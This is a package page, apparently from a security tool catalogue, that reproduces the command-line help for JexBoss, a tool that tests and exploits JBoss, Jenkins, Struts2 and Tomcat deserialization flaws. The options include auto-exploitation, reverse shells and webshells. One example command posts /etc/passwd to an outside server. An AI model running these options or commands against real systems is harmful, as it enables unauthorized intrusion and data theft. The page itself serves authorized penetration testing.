Loading ...

jexboss

Package

  • jexboss - JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms

Usage

usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] [-mode {standalone,auto-scan,file-scan}] [--app-unserialize] [--servlet-unserialize] [--jboss] [--jenkins] [--struts2] [--jmxtomcat] [--proxy PROXY]
[--proxy-cred LOGIN:PASS] [--jboss-login LOGIN:PASS] [--timeout TIMEOUT] [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD] [--dns URL] [--windows] [--post-parameter PARAMETER] [--show-payload]
[--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}] [--load-gadget FILENAME] [--force] [-host HOST] [-network NETWORK] [-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS]
[-out FILENAME_RESULTS]
options:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at
http://joaomatosf.com/rnp/releases.txt
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector (CVE-2015-5317).
--struts2 Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-3427). OBS: Will not be checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
--cookies NAME=VALUE Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. Format: "NAME1=VALUE1; NAME2=VALUE2" (eg. --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331)
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)
--dns URL Specifies the dns query for use with "dns" Gadget
--windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}
Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per line)
-out FILENAME_RESULTS
File name to store the file scan results

Install jexboss
sudo apt install jexboss
Remove jexboss
sudo apt remove jexboss

Don’t Want to Miss Anything?

Sign up for Newsletters

* Yes, I agree to the terms and privacy policy
Top